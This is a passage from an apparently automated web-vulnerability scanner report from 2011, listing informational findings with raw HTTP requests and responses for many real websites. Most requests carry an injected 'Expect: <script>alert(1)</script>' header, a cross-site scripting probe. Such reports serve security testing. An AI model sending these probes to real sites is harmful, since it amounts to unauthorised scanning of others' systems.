Host:   http://www.nfcc.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nfcc.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:18:11 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.64. http://www.noonetube.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.noonetube.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.noonetube.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:58:31 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.65</center>
</body>
</html>

33.65. http://www.nylaarp.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nylaarp.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nylaarp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:33:19 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.66. http://www.onlinemicrofiche.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinemicrofiche.com
Path:   /

Request

GET / HTTP/1.1
Host: www.onlinemicrofiche.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:04:13 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

33.67. http://www.onlinemoneystash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onlinemoneystash.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.onlinemoneystash.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


33.68. http://www.oshkosh365.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oshkosh365.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oshkosh365.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:36:09 GMT
Connection: keep-alive
Set-Cookie: BIGipServerwebservers-http-pool=1191252140.20480.0000; path=/

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33.69. http://www.phonedelivery4g.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phonedelivery4g.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phonedelivery4g.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:00:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

33.70. http://www.picindividuals.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.picindividuals.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.picindividuals.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:51:26 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.71. http://www.recon.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recon.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.recon.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
WS: 5
Date: Sun, 01 May 2011 23:33:59 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.72. http://www.redirectgame.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redirectgame.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.redirectgame.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:40 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.73. http://www.right-ads.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.right-ads.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.right-ads.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Mon, 02 May 2011 00:04:47 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.39</center>
</body>
</html>

33.74. http://www.righttoworkfoundation.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.righttoworkfoundation.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.righttoworkfoundation.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:11:08 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33.75. http://www.ronniesmailorder.com/fiche_select1.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /fiche_select1.asp

Request

GET /fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:06:17 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; path=/
Vary: Accept-Encoding
Content-Length: 483234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<SCRIPT src="http://www.psnnewsletter.com/psnpopup.js" LANGUAGE="JavaScript"></SCRIPT>
<script src="http://www.powersportsnetwork.com/f
...[SNIP]...

33.76. http://www.ronniesmailorder.com/testimonials_display.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ronniesmailorder.com
Path:   /testimonials_display.asp

Request

GET /testimonials_display.asp HTTP/1.1
Host: www.ronniesmailorder.com
Proxy-Connection: keep-alive
Referer: http://www.ronniesmailorder.com/fiche_select1.asp?cat=Motorcycles&mfg=Kawasaki
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sid=08976557X5K1K2011J9I06I09JPMQ2929R0; __utmz=228257950.1304319978.1.1.utmcsr=ronnies.com|utmccn=(referral)|utmcmd=referral|utmcct=/micro.htm; __utma=228257950.337968248.1304319978.1304319978.1304319978.1; __utmc=228257950; __utmb=228257950.1.10.1304319978

Response

HTTP/1.1 200 OK
Cache-Control: Private
Date: Mon, 02 May 2011 02:07:08 GMT
Pragma: no-store
Content-Type: text/html
Expires: Thu, 29 Apr 1999 12:00:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10

<!--T:0-->

33.77. http://www.rustoleum.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rustoleum.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rustoleum.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:30:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.78. http://www.snapfinger.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snapfinger.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.snapfinger.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:55:37 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.79. http://www.str8boyzseduced.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.str8boyzseduced.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.str8boyzseduced.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Sun, 01 May 2011 23:35:30 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>

33.80. http://www.tacklewarehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tacklewarehouse.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tacklewarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:48:24 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Fri, 09 Jul 2010 16:15:49 GMT
Content-Length: 82726
Content-Type: text/html

............ .h...F... .... .........00.... ..%..V......... .(....:..(....... ..... ...................................................................................................................
...[SNIP]...

33.81. http://www.techonlife.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.techonlife.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.techonlife.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 403 Forbidden
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>


33.82. http://www.tenniswarehouse.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenniswarehouse.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tenniswarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:18 GMT
Server: Kerio_WebSTAR/5.4.2 (MacOS X)
Connection: Close
Accept-Ranges: bytes
Last-Modified: Wed, 02 Mar 2005 01:31:45 GMT
Content-Length: 1406
Content-Type: text/html

..............h.......(....... ...........@............................nL......................H*......de.......{..........0.......Y-..............{u..TC......C........|..h?.......h..{Z.......... ....
...[SNIP]...

33.83. http://www.termite.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.termite.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.termite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:03:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.84. http://www.tube555.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tube555.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tube555.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/1.0.0
Date: Mon, 02 May 2011 00:22:27 GMT
Content-Type: text/html
Content-Length: 168
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.0.0</center>
</body>
</html>

33.85. http://www.tubespecials.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tubespecials.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tubespecials.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:17 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.86. http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/html/xd_receiver.htm

Request

GET /wp-adv/jobs4/html/xd_receiver.htm HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wpni_poe=true; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html
Expires: Sun, 01 May 2011 23:34:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:33 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Cross-Domain Receiver Page</tit
...[SNIP]...

33.87. http://www.weddings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weddings.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.weddings.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 00:28:37 GMT
Content-Length: 640
Content-Type: text/html
Server: Microsoft-IIS/6.0
box: 03
X-Powered-By: ASP.NET

<html><head><title>Error</title></head><body>The system cannot find the file specified.
<!-- Start HtmlInjectISAPIFilter --><script type="text/javascript">if(!_isexec){var _isexec=true;(function(){va
...[SNIP]...

33.88. http://www.wheelfire.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wheelfire.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wheelfire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:35:05 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.89. http://www.womenolder.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.womenolder.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.womenolder.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Date: Sun, 01 May 2011 23:16:09 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.6.32</center>
</body>
</html>

33.90. http://www.wtuber.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtuber.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wtuber.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 01 May 2011 23:46:42 GMT
Server: lighttpd/1.4.26

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

33.91. http://www.wyeke.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wyeke.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wyeke.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:57 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.92. http://www.yoplait.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yoplait.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yoplait.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Mon, 02 May 2011 00:33:03 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

34. HTML uses unrecognised charset
There are 4 instances of this issue:


34.1. http://www.animeyoung.com/favicon.ico

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.animeyoung.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.animeyoung.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 02 May 2011 00:34:02 GMT
Content-Type: text/html
Content-Length: 516
Connection: keep-alive

<HTML><HEAD>

<TITLE>ERROR 404 - Page can not be found</TITLE>
<!--DoctorPleasure.com - Adult Index Page-->

<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<base target="_blank">
...[SNIP]...

34.2. http://www.mktginc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.mktginc.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mktginc.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Length: 355
Keep-Alive: timeout-5, max=1000
Connection: Keep-Alive
Cache-Control: no-cache
Content-Type: text/html; charset="iso-8859-1"

<html><head><title>Attack Detected</title></head><body><font size=2><table width="100%"><tr><td bgcolor=#3300cc align="center" colspan=2><font color=#ffffff><b>Blocked because of IPS attack</b></font>
...[SNIP]...

34.3. http://www.swoopo.com/favicon.ico

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.swoopo.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swoopo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
P3P: policyref="/w3c/p3p.xml", CP="NOI NAV IND PSAa OUR"
Content-Type: text/html
Accept-Ranges: bytes
ETag: "1135910088"
Last-Modified: Fri, 08 Oct 2010 07:13:20 GMT
Content-Length: 1660
Xonnection: close
Date: Mon, 02 May 2011 00:19:45 GMT
Server: swoopo-httpd

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=" />
<title>
...[SNIP]...

34.4. http://www.washingtonpost.com/wl/jobs/home

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wl/jobs/home

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: text/html; charset=ISO8859_1
Expires: Sun, 01 May 2011 23:32:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:53 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: WashingtonJobsSession=qZrzN9tFJw3JhJnTRRd4t88nZFhtDgPRL1L4JF6PJZZvhvG4smnP!-945584298; domain=.washingtonpost.com; path=/
Content-Length: 35809


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<!--Server: jobs3a GUID:f823c81588328017643c787765c5da54 Sun May 01 19:32:53 EDT 2011-->
<head>
<title>
   
       
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="Washington DC jobs, Washington DC careers, Washington DC area jobs, Washington DC area careers, search jobs, search careers, search DC jobs">
...[SNIP]...

35. Content type incorrectly stated
There are 77 instances of this issue:


35.1. http://bdv.bidvertiser.com/BidVertiser.dbm

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bdv.bidvertiser.com
Path:   /BidVertiser.dbm

Issue detail

The response contains the following Content-type statement:

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BidVertiser.dbm?pid=349166&bid=862453 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bdv.bidvertiser.com

Response

HTTP/1.1 200 OK
Date: Monday, 02-May-2011 02:34:50 GMT
Cache-Control: no-store
Last-Modified: Sunday, 02-May-2010 02:34:50 GMT
P3P: policyref="http://www.bidvertiser.com/bdv/bidvertiser/p3p.xml", CP="NOI DEV PSA PSD IVA OTP OUR OTR IND OTC"
Content-Type: text/html; charset=ISO-8859-1
Content-Len: 1393
Warning: 214 "Juniper Networks DX Active"
Vary: Accept-Encoding, User-Agent
Content-Length: 1393


try
{
tref=1;
win_name='null';
report_error=0;
docref='';
try
{
